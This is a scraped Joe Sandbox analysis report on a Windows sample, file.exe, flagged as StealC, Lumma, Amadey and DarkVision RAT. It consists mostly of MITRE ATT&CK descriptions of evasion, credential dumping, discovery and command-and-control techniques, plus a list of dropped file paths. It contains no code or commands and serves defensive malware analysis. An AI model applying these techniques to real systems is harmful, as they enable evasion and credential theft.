Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Amadey

Threatname: DarkVision Rat

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BAFBFCBG

C:\ProgramData\CAEBGHDBKEBGIDHJJEHC

C:\ProgramData\ECFHJKEBAAECBFHIECGI

C:\ProgramData\JJDGCGHC

Windows Analysis Report
file.exe

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre